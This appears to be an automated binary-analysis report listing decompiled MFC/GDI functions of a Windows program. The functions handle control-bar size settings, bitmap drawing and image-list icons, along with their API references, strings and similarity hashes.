0x00416ea4

APIs

_EH_prolog.MSVCRT ref: 00416CCF
#323.MFC42 ref: 00416CDD
GetObjectA.GDI32(?,00000018,?), ref: 00416CF3
CreateCompatibleDC.GDI32(00000000), ref: 00416D00
#1640.MFC42(00000000), ref: 00416D06
#5785.MFC42(?,?,00000000), ref: 00416D1A
#323.MFC42(?,?,00000000), ref: 00416D25
CreateCompatibleDC.GDI32(00000000), ref: 00416D4D
#1640.MFC42(00000000), ref: 00416D53
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00416D61
#1641.MFC42(00000000), ref: 00416D6B
CreateSolidBrush.GDI32(00C0C0C0), ref: 00416D75
#1641.MFC42(00000000), ref: 00416D7F
#5785.MFC42(?,?,00000000), ref: 00416D92
FillRect.USER32 ref: 00416DBD
GetPixel.GDI32(?,00000001,00000001), ref: 00416DD0
#2414.MFC42 ref: 00416DD8
#5785.MFC42(?,?), ref: 00416DEC
GetSysColor.USER32(0000000F), ref: 00416DF3
GetPixel.GDI32(?,?,00000000), ref: 00416E12
SetPixel.GDI32(?,?,00000000,?), ref: 00416E23
#5785.MFC42(?,00000003), ref: 00416E4C
#2414.MFC42(?,00000003), ref: 00416E60
#2414.MFC42(?,00000003), ref: 00416E77
#640.MFC42(?,00000003), ref: 00416E85
#640.MFC42(?,00000003), ref: 00416E91

Strings

\B, xrefs: 00416D7C
LB, xrefs: 00416D68

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640$BitmapBrushColorFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 4078948297-2432678322
Opcode ID: 800081178e2e60d2f4a4478195b5793cb73e8f7a2514b860bd97473076329dae
Instruction ID: ee6b797c4c201efc0c7bec6ebf3fb44d38b03c1f70a108526d7de10351dceb75
Opcode Fuzzy Hash: 800081178e2e60d2f4a4478195b5793cb73e8f7a2514b860bd97473076329dae
Instruction Fuzzy Hash: E5514672E00258EACF01EFE5ED819EEBB75FF48304F51412AE405A7251DB389A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004114E7, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E004114E7(void* __eax, void* __ecx, intOrPtr _a4) {
				char _v260;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				CHAR* _t46;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t49;
				CHAR* _t50;
				CHAR* _t51;
				CHAR* _t52;
				CHAR* _t53;
				CHAR* _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				void* _t76;

				_t76 = __ecx;
				L00425E44();
				L00426510();
				wsprintfA( &_v260, "%s-SCBar-%d", _a4, __eax);
				_t55 =  *((intOrPtr*)(_t76 + 0x9c));
				_push( *((intOrPtr*)(_t76 + 0x84)));
				_t43 =  &_v260;
				_push("sizeHorzCX");
				_push(_t43);
				L00425E3E();
				if(_t55 <= _t43) {
					_push( *((intOrPtr*)(_t76 + 0x84)));
					_t44 =  &_v260;
					_push("sizeHorzCX");
					_push(_t44);
					L00425E3E();
				} else {
					_t44 = _t55;
				}
				_push( *((intOrPtr*)(_t76 + 0x88)));
				_t56 =  *((intOrPtr*)(_t76 + 0xa0));
				 *((intOrPtr*)(_t76 + 0x84)) = _t44;
				_t45 =  &_v260;
				_push("sizeHorzCY");
				_push(_t45);
				L00425E3E();
				if(_t56 <= _t45) {
					_push( *((intOrPtr*)(_t76 + 0x88)));
					_t46 =  &_v260;
					_push("sizeHorzCY");
					_push(_t46);
					L00425E3E();
				} else {
					_t46 = _t56;
				}
				_push( *((intOrPtr*)(_t76 + 0x8c)));
				_t57 =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(_t76 + 0x88)) = _t46;
				_t47 =  &_v260;
				_push("sizeVertCX");
				_push(_t47);
				L00425E3E();
				if(_t57 <= _t47) {
					_push( *((intOrPtr*)(_t76 + 0x8c)));
					_t48 =  &_v260;
					_push("sizeVertCX");
					_push(_t48);
					L00425E3E();
				} else {
					_t48 = _t57;
				}
				_push( *((intOrPtr*)(_t76 + 0x90)));
				_t58 =  *((intOrPtr*)(_t76 + 0xa8));
				 *((intOrPtr*)(_t76 + 0x8c)) = _t48;
				_t49 =  &_v260;
				_push("sizeVertCY");
				_push(_t49);
				L00425E3E();
				if(_t58 <= _t49) {
					_push( *((intOrPtr*)(_t76 + 0x90)));
					_t50 =  &_v260;
					_push("sizeVertCY");
					_push(_t50);
					L00425E3E();
				} else {
					_t50 = _t58;
				}
				_push( *((intOrPtr*)(_t76 + 0x94)));
				_t59 =  *((intOrPtr*)(_t76 + 0xac));
				 *((intOrPtr*)(_t76 + 0x90)) = _t50;
				_t51 =  &_v260;
				_push("sizeFloatCX");
				_push(_t51);
				L00425E3E();
				if(_t59 <= _t51) {
					_push( *((intOrPtr*)(_t76 + 0x94)));
					_t52 =  &_v260;
					_push("sizeFloatCX");
					_push(_t52);
					L00425E3E();
				} else {
					_t52 = _t59;
				}
				_push( *((intOrPtr*)(_t76 + 0x98)));
				_t60 =  *((intOrPtr*)(_t76 + 0xb0));
				 *((intOrPtr*)(_t76 + 0x94)) = _t52;
				_t53 =  &_v260;
				_push("sizeFloatCY");
				_push(_t53);
				L00425E3E();
				if(_t60 <= _t53) {
					_push( *((intOrPtr*)(_t76 + 0x98)));
					_t54 =  &_v260;
					_push("sizeFloatCY");
					_push(_t54);
					L00425E3E();
				} else {
					_t54 = _t60;
				}
				 *((intOrPtr*)(_t76 + 0x98)) = _t54;
				return _t54;
			}

0x004114f3
0x004114f5
0x004114ff
0x00411514
0x0041151a
0x00411523
0x00411529
0x00411531
0x00411536
0x00411537
0x0041153e
0x00411544
0x0041154a
0x00411552
0x00411557
0x00411558
0x00411540
0x00411540
0x00411540
0x0041155d
0x00411563
0x00411569
0x0041156f
0x00411575
0x0041157a
0x0041157d
0x00411584
0x0041158a
0x00411590
0x00411598
0x0041159d
0x0041159e
0x00411586
0x00411586
0x00411586
0x004115a3
0x004115a9
0x004115af
0x004115b5
0x004115bb
0x004115c0
0x004115c3
0x004115ca
0x004115d0
0x004115d6
0x004115de
0x004115e3
0x004115e4
0x004115cc
0x004115cc
0x004115cc
0x004115e9
0x004115ef
0x004115f5
0x004115fb
0x00411601
0x00411606
0x00411609
0x00411610
0x00411616
0x0041161c
0x00411624
0x00411629
0x0041162a
0x00411612
0x00411612
0x00411612
0x0041162f
0x00411635
0x0041163b
0x00411641
0x00411647
0x0041164c
0x0041164f
0x00411656
0x0041165c
0x00411662
0x0041166a
0x0041166f
0x00411670
0x00411658
0x00411658
0x00411658
0x00411675
0x0041167b
0x00411681
0x00411687
0x0041168d
0x00411692
0x00411695
0x0041169c
0x004116a2
0x004116a8
0x004116b0
0x004116b5
0x004116b6
0x0041169e
0x0041169e
0x0041169e
0x004116bb
0x004116c5

APIs

#1168.MFC42 ref: 004114F5
#3089.MFC42 ref: 004114FF
wsprintfA.USER32 ref: 00411514
#3521.MFC42(?,sizeHorzCX,?), ref: 00411537
#3521.MFC42(?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 00411558
#3521.MFC42(?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 0041157D
#3521.MFC42(?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 0041159E
#3521.MFC42(?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 004115C3
#3521.MFC42(?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?), ref: 004115E4
#3521.MFC42(?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?), ref: 00411609
#3521.MFC42(?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?), ref: 0041162A
#3521.MFC42(?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?), ref: 0041164F
#3521.MFC42(?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?), ref: 00411670
#3521.MFC42(?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?), ref: 00411695
#3521.MFC42(?,sizeFloatCY,?,?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?), ref: 004116B6

Strings

sizeHorzCY, xrefs: 00411598
sizeFloatCY, xrefs: 004116B0
sizeVertCX, xrefs: 004115DE
sizeHorzCX, xrefs: 00411552
%s-SCBar-%d, xrefs: 0041150E
sizeFloatCX, xrefs: 00411647
sizeHorzCY, xrefs: 00411575
sizeVertCY, xrefs: 00411624
sizeFloatCY, xrefs: 0041168D
sizeFloatCX, xrefs: 0041166A
sizeVertCY, xrefs: 00411601
sizeHorzCX, xrefs: 00411531
sizeVertCX, xrefs: 004115BB

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521$#1168#3089wsprintf
String ID: %s-SCBar-%d$sizeFloatCX$sizeFloatCX$sizeFloatCY$sizeFloatCY$sizeHorzCX$sizeHorzCX$sizeHorzCY$sizeHorzCY$sizeVertCX$sizeVertCX$sizeVertCY$sizeVertCY
API String ID: 4142564528-3161464612
Opcode ID: bb898db687b8147469851e7479a399ff54c7d881de040778f75372e9c5eca4b3
Instruction ID: 1b8e30a190424b5a939b1aec085ebcf61c44688613ad642de1f0b12875628a5e
Opcode Fuzzy Hash: bb898db687b8147469851e7479a399ff54c7d881de040778f75372e9c5eca4b3
Instruction Fuzzy Hash: 5F41BA34700715ABCB219B708D91FEBB7EABB48308F10045FF69ED3351DA7969948B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401780, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 181
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401780(void* __edx) {
				long _t89;
				struct HDC__* _t90;
				struct HBITMAP__* _t92;
				struct HBRUSH__* _t108;
				int _t109;
				void* _t110;
				struct HBITMAP__* _t112;
				struct HBITMAP__* _t116;
				intOrPtr _t117;
				void* _t119;
				int _t125;
				void* _t139;
				int _t141;
				int _t142;
				int _t147;
				int _t149;
				void* _t153;

				_t139 = __edx;
				L004269E6();
				L004264B0();
				_t141 = 0;
				 *(_t153 - 0x18) =  *(_t153 + 0x10);
				_t147 = 0;
				 *(_t153 - 4) = 0;
				 *(_t153 - 0x14) =  *(_t153 + 0x14);
				if( *0x4421ac != 7 || L00401F23() != 0) {
					_push(4);
				} else {
					_push(0xf);
				}
				_t89 = GetSysColor();
				_t116 =  *(_t153 + 8);
				 *(_t153 - 0x10) = _t89;
				if(_t116 != _t141) {
					_t90 =  *(_t116 + 4);
				} else {
					_t90 = 0;
				}
				_push(CreateCompatibleDC(_t90));
				L004264AA();
				_t92 = CreateCompatibleBitmap( *(_t116 + 4),  *(_t153 + 0x18),  *(_t153 + 0x1c));
				_t117 =  *((intOrPtr*)(_t153 + 0xc));
				_push(_t92);
				L004264BC();
				if(_t117 != 0) {
					_t117 =  *((intOrPtr*)(_t117 + 4));
				}
				_push(_t117);
				_push( *(_t153 - 0x3c));
				L00426540();
				 *(_t153 + 8) = _t92;
				if( *(_t153 + 0x10) !=  *(_t153 + 0x18) ||  *(_t153 + 0x14) !=  *(_t153 + 0x1c)) {
					 *(_t153 - 0x20) = 0x42e55c;
					 *(_t153 - 0x1c) = 0;
					 *(_t153 - 4) = 1;
					_push(CreateSolidBrush( *(_t153 - 0x10)));
					L004264BC();
					_t142 =  *(_t153 + 0x1c);
					asm("sbb eax, eax");
					 *(_t153 - 0x50) = 0;
					 *((intOrPtr*)(_t153 - 0x4c)) = 0;
					_t149 =  *(_t153 + 0x18);
					 *(_t153 - 0x44) = _t142;
					 *(_t153 - 0x48) = _t149;
					FillRect( *(_t153 - 0x3c), _t153 - 0x50,  ~(_t153 - 0x20) &  *(_t153 - 0x1c));
					_t125 =  *(_t153 + 0x10);
					asm("cdq");
					_t147 = _t149 - _t125 - _t139 >> 1;
					asm("cdq");
					_t141 = _t142 -  *(_t153 + 0x14) - _t139 >> 1;
					 *(_t153 - 0x18) = _t125 + _t147;
					 *(_t153 - 0x14) =  *(_t153 + 0x14) + _t141;
					L00425FA6();
					 *(_t153 - 0x20) = 0x42c514;
					 *(_t153 - 4) = 2;
					L00425FA6();
					 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
					 *(_t153 - 0x20) = 0x42c4fc;
				}
				_push( *((intOrPtr*)(_t153 + 0x24)));
				_push(1);
				_push(0);
				L00426726();
				 *(_t153 - 0x24) =  *(_t153 - 0x24) & 0x00000000;
				 *((intOrPtr*)(_t153 - 0x28)) = 0x42e55c;
				_push( *((intOrPtr*)(_t153 + 0x20)));
				 *(_t153 - 4) = 4;
				if( *(_t153 + 0x28) == 0xffffffff) {
					_t108 = CreateSolidBrush();
				} else {
					_t108 = CreateHatchBrush( *(_t153 + 0x28), ??);
				}
				_push(_t108);
				L004264BC();
				_t109 = _t153 - 0x30;
				_push(_t109);
				L00426636();
				 *(_t153 + 0x28) = _t109;
				_t110 = _t153 - 0x28;
				_push(_t110);
				L00426570();
				_t119 = _t110;
				Rectangle( *(_t153 - 0x3c), _t147, _t141,  *(_t153 - 0x18),  *(_t153 - 0x14));
				if(_t119 != 0) {
					_push(_t119);
					L00426570();
				}
				if( *(_t153 + 0x28) != 0) {
					_push( *(_t153 + 0x28));
					L00426636();
				}
				_t112 =  *(_t153 + 8);
				if(_t112 != 0) {
					_push( *((intOrPtr*)(_t112 + 4)));
					_push( *(_t153 - 0x3c));
					L00426540();
				}
				 *((intOrPtr*)(_t153 - 0x28)) = 0x42c514;
				 *(_t153 - 4) = 5;
				L00425FA6();
				 *(_t153 - 0x30) = 0x42c514;
				 *((intOrPtr*)(_t153 - 0x28)) = 0x42c4fc;
				 *(_t153 - 4) = 6;
				L00425FA6();
				 *(_t153 - 4) =  *(_t153 - 4) | 0xffffffff;
				 *(_t153 - 0x30) = 0x42c4fc;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
				return _t112;
			}

0x00401780
0x00418bcc
0x00418bd9
0x00418be1
0x00418be3
0x00418be9
0x00418bf2
0x00418bf5
0x00418bf8
0x00418c07
0x00418c03
0x00418c03
0x00418c03
0x00418c09
0x00418c10
0x00418c15
0x00418c18
0x00418c1e
0x00418c1a
0x00418c1a
0x00418c1a
0x00418c28
0x00418c2c
0x00418c3a
0x00418c40
0x00418c43
0x00418c46
0x00418c4d
0x00418c4f
0x00418c4f
0x00418c52
0x00418c53
0x00418c56
0x00418c5b
0x00418c69
0x00418c79
0x00418c7c
0x00418c82
0x00418c8c
0x00418c90
0x00418c98
0x00418c9d
0x00418c9f
0x00418ca5
0x00418ca8
0x00418cab
0x00418cb3
0x00418cb9
0x00418cbf
0x00418cc6
0x00418cd0
0x00418cd2
0x00418cdc
0x00418cde
0x00418ce6
0x00418ce9
0x00418cee
0x00418cf8
0x00418cfc
0x00418d01
0x00418d05
0x00418d05
0x00418d0c
0x00418d12
0x00418d14
0x00418d16
0x00418d1b
0x00418d1f
0x00418d26
0x00418d29
0x00418d2d
0x00418d3a
0x00418d2f
0x00418d32
0x00418d32
0x00418d40
0x00418d44
0x00418d49
0x00418d4f
0x00418d50
0x00418d55
0x00418d58
0x00418d5b
0x00418d5f
0x00418d67
0x00418d71
0x00418d79
0x00418d7b
0x00418d7f
0x00418d7f
0x00418d89
0x00418d8b
0x00418d91
0x00418d91
0x00418d96
0x00418d9b
0x00418d9d
0x00418da0
0x00418da3
0x00418da3
0x00418dad
0x00418db3
0x00418db7
0x00418dc1
0x00418dc4
0x00418dca
0x00418dce
0x00418dd3
0x00418dda
0x00418ddd
0x00418de7
0x00418def

APIs

_EH_prolog.MSVCRT ref: 00418BCC
#323.MFC42 ref: 00418BD9
GetSysColor.USER32(00000004), ref: 00418C09
CreateCompatibleDC.GDI32(?), ref: 00418C22
#1640.MFC42(00000000), ref: 00418C2C
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00418C3A
#1641.MFC42(00000000), ref: 00418C46
#5785.MFC42(?,?,00000000), ref: 00418C56
CreateSolidBrush.GDI32(?), ref: 00418C86
#1641.MFC42(00000000), ref: 00418C90
FillRect.USER32 ref: 00418CB9
#2414.MFC42 ref: 00418CE9
#2414.MFC42 ref: 00418CFC
#472.MFC42(00000000,00000001,?), ref: 00418D16
CreateHatchBrush.GDI32(000000FF,0042C4FC,00000000,00000001,?), ref: 00418D32
CreateSolidBrush.GDI32(0042C4FC), ref: 00418D3A
#1641.MFC42(00000000), ref: 00418D44
#5787.MFC42(?,00000000), ref: 00418D50
#5787.MFC42(000000FF,?,00000000), ref: 00418D5F
Rectangle.GDI32(?,?,?,?,?), ref: 00418D71
#5787.MFC42(00000000), ref: 00418D7F
#5787.MFC42(00000000), ref: 00418D91
#5785.MFC42(?,00000004), ref: 00418DA3
#2414.MFC42(?,00000004), ref: 00418DB7
#2414.MFC42(?,00000004), ref: 00418DCE
#640.MFC42(?,00000004), ref: 00418DDD

Strings

\B, xrefs: 00418C64

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$#2414#5787$#1641Brush$#5785CompatibleSolid$#1640#323#472#640BitmapColorFillH_prologHatchRectRectangle
String ID: \B
API String ID: 105411479-2993081821
Opcode ID: 051934ce10c3156da13b44adfb1675b756a4271df16d717ba1bf30308a9be704
Instruction ID: f4518a469f128477e29ab15309310bb1539545ff6cb9bcf1aa8a11cd8155a704
Opcode Fuzzy Hash: 051934ce10c3156da13b44adfb1675b756a4271df16d717ba1bf30308a9be704
Instruction Fuzzy Hash: 81715C71E00269EFCF00DFA5E985ADEBBB4BF58304F15412AF905A3251DB389945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401140, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 232
windowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401140(intOrPtr __ecx, void* __fp0) {
				void* _t110;
				void* _t112;
				int _t113;
				struct HWND__* _t116;
				struct HDC__* _t118;
				long _t137;
				struct HWND__* _t142;
				intOrPtr _t145;
				long _t146;
				long _t152;
				void* _t165;
				struct HDC__* _t199;
				intOrPtr* _t204;
				void* _t207;
				void* _t217;

				_t217 = __fp0;
				L004269E6();
				 *(_t207 - 0x14) =  *(_t207 - 0x14) & 0x00000000;
				_t204 = ImageList_AddMasked;
				_push( *(_t207 + 0xc));
				 *((intOrPtr*)(_t207 - 0x10)) = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
					_t110 = L00402239();
					 *(_t207 - 0x18) = _t110;
					if(_t110 == 0) {
						L00401974(_t207 - 0x24);
						 *(_t207 - 0x24) = 0x42e34c;
						_t34 = _t207 - 0x24; // 0x42e34c
						 *(_t207 - 4) = 1;
						_t112 = L004015AF(_t34,  *(_t207 + 0xc));
						_t199 =  *(_t207 + 8);
						if(_t112 != 0) {
							_t38 = _t207 - 0x24; // 0x42e34c
							 *0x4421ec = 1;
							E0040112C();
							_t145 =  *((intOrPtr*)(_t207 - 0x10));
							if( *((intOrPtr*)(_t145 + 0x34)) == 0) {
								_t146 = GetSysColor(0xf);
								_t44 = _t207 - 0x24; // 0x42e34c
								_push(_t146);
								asm("sbb ecx, ecx");
								_push( ~_t44 &  *(_t207 - 0x20));
							} else {
								_t42 = _t207 - 0x24; // 0x42e34c
								asm("sbb eax, eax");
								_push( *((intOrPtr*)(_t145 + 0x30)));
								_push( ~_t42 &  *(_t207 - 0x20));
							}
							_push( *(_t199 + 4));
							if( *_t204() >= 0) {
								 *(_t207 - 0x14) = 1;
							}
						}
						 *(_t207 - 4) =  *(_t207 - 4) | 0xffffffff;
						 *(_t207 - 0x24) = 0x42e34c;
						_t51 = _t207 - 0x24; // 0x42e34c
						_t165 = _t51;
					} else {
						L00401974(_t207 - 0x24);
						 *(_t207 - 0x24) = 0x42e34c;
						_push( *(_t207 - 0x18));
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						L004264BC();
						if( *((intOrPtr*)(__ecx + 0x34)) == 0) {
							_t152 = GetSysColor(0xf);
							_t20 = _t207 - 0x24; // 0x42e34c
							_push(_t152);
							asm("sbb ecx, ecx");
							_push( ~_t20 &  *(_t207 - 0x20));
						} else {
							_t18 = _t207 - 0x24; // 0x42e34c
							asm("sbb eax, eax");
							_push( *((intOrPtr*)(__ecx + 0x30)));
							_push( ~_t18 &  *(_t207 - 0x20));
						}
						_t199 =  *(_t207 + 8);
						_push( *(_t199 + 4));
						if( *_t204() >= 0) {
							 *(_t207 - 0x14) = 1;
						}
						L00426714();
						DeleteObject( *(_t207 - 0x18));
						 *(_t207 - 4) =  *(_t207 - 4) | 0xffffffff;
						 *(_t207 - 0x24) = 0x42e34c;
						_t30 = _t207 - 0x24; // 0x42e34c
						_t165 = _t30;
					}
					_t113 = L00401D66(_t165);
					if( *(_t207 - 0x14) == 0) {
						goto L23;
					} else {
						goto L18;
					}
				} else {
					_t199 =  *(_t207 + 8);
					_t113 = ImageList_ReplaceIcon( *(_t199 + 4), 0xffffffff, ??);
					 *(_t207 - 0x14) = 1;
					L18:
					if(L0040214E(_t113) != 0 &&  *0x440cfc != 0) {
						_t116 = L00401307();
						 *(_t207 + 0xc) = _t116;
						if(_t116 == 0) {
							_t142 = GetDesktopWindow();
							_push(_t142);
							L00426372();
							 *(_t207 + 0xc) = _t142;
						}
						_t118 = GetDC( *( *(_t207 + 0xc) + 0x20));
						L00425FD0();
						 *(_t207 - 0x30) =  *(_t207 - 0x30) & 0x00000000;
						 *(_t207 + 8) = _t118;
						 *(_t207 - 0x34) = 0x42e34c;
						 *(_t207 - 0x28) =  *(_t207 - 0x28) & 0x00000000;
						 *(_t207 - 4) = 2;
						 *(_t207 - 0x2c) = 0x42e34c;
						L00401974(_t207 - 0x1c);
						 *(_t207 - 0x1c) = 0x42e34c;
						 *(_t207 - 4) = 4;
						E004010A0();
						L0040227A();
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~(_t207 - 0x34) &  *(_t207 - 0x30), GetSysColor(0xf), _t207 - 0x34,  *(_t207 + 8), _t199, 0, _t207 - 0x34, _t118);
						E004010A0();
						L004019A6();
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~(_t207 - 0x2c) &  *(_t207 - 0x28), GetSysColor(0xf), _t207 - 0x2c,  *(_t207 + 8), _t199, 0, _t207 - 0x2c);
						_t85 = _t207 - 0x1c; // 0x42e34c
						E004010A0();
						_t88 = _t207 - 0x1c; // 0x42e34c
						L00401221(_t217);
						_t137 = GetSysColor(0xf);
						_t89 = _t207 - 0x1c; // 0x42e34c
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~_t89 &  *(_t207 - 0x18), _t137, _t88, 0,  *(_t207 + 8), _t199, 0, _t85);
						ReleaseDC( *( *(_t207 + 0xc) + 0x20),  *( *(_t207 + 8) + 4));
						 *(_t207 - 0x1c) = 0x42c514;
						 *(_t207 - 4) = 5;
						L00425FA6();
						 *(_t207 - 0x2c) = 0x42c514;
						 *(_t207 - 0x1c) = 0x42c4fc;
						 *(_t207 - 4) = 6;
						L00425FA6();
						 *(_t207 - 0x2c) = 0x42c4fc;
						 *(_t207 - 0x34) = 0x42c514;
						 *(_t207 - 4) = 7;
						L00425FA6();
					}
					L23:
					 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
					return  *(_t207 - 0x14);
				}
			}

0x00401140
0x004172e6
0x004172ee
0x004172fa
0x00417301
0x00417306
0x0041730d
0x00417329
0x00417331
0x00417334
0x004173b5
0x004173ba
0x004173c4
0x004173c7
0x004173ce
0x004173d3
0x004173d8
0x004173dd
0x004173e1
0x004173eb
0x004173f0
0x004173f7
0x0041740c
0x0041740e
0x00417411
0x00417414
0x00417419
0x004173f9
0x004173fc
0x00417401
0x00417403
0x00417407
0x00417407
0x0041741a
0x00417421
0x00417423
0x00417423
0x00417421
0x0041742a
0x0041742e
0x00417435
0x00417435
0x00417336
0x00417339
0x0041733e
0x00417345
0x00417348
0x0041734f
0x00417358
0x0041736d
0x0041736f
0x00417372
0x00417375
0x0041737a
0x0041735a
0x0041735d
0x00417362
0x00417364
0x00417368
0x00417368
0x0041737b
0x0041737e
0x00417385
0x00417387
0x00417387
0x00417391
0x00417399
0x0041739f
0x004173a3
0x004173aa
0x004173aa
0x004173aa
0x00417438
0x00417441
0x00000000
0x00000000
0x00000000
0x00000000
0x0041730f
0x0041730f
0x00417317
0x0041731d
0x00417447
0x0041744e
0x00417461
0x00417468
0x0041746b
0x0041746d
0x00417473
0x00417474
0x00417479
0x00417479
0x00417482
0x00417489
0x0041748e
0x00417492
0x0041749a
0x0041749d
0x004174a1
0x004174a8
0x004174ae
0x004174b3
0x004174c4
0x004174cb
0x004174d7
0x004174e6
0x004174ef
0x004174fe
0x0041750a
0x00417519
0x00417522
0x00417527
0x00417531
0x00417539
0x0041753f
0x00417546
0x00417548
0x0041754e
0x00417557
0x00417565
0x00417570
0x00417576
0x0041757a
0x00417584
0x00417587
0x0041758d
0x00417591
0x00417596
0x00417599
0x0041759f
0x004175a6
0x004175a6
0x004175ab
0x004175b4
0x004175bc
0x004175bc

APIs

_EH_prolog.MSVCRT ref: 004172E6
ImageList_ReplaceIcon.COMCTL32(?,000000FF), ref: 00417317
#1641.MFC42(?), ref: 0041734F
ImageList_AddMasked.COMCTL32(00000000,?,00000000), ref: 00417381
#2452.MFC42 ref: 00417391
DeleteObject.GDI32(?), ref: 00417399
GetDesktopWindow.USER32 ref: 0041746D
#2864.MFC42(00000000), ref: 00417474
GetDC.USER32(?), ref: 00417482
#2859.MFC42(00000000), ref: 00417489
GetSysColor.USER32(0000000F), ref: 004174DE
ImageList_AddMasked.COMCTL32(00000004,00000000,00000000), ref: 004174EF
GetSysColor.USER32(0000000F), ref: 00417511
ImageList_AddMasked.COMCTL32(00000004,00000000,00000000), ref: 00417522

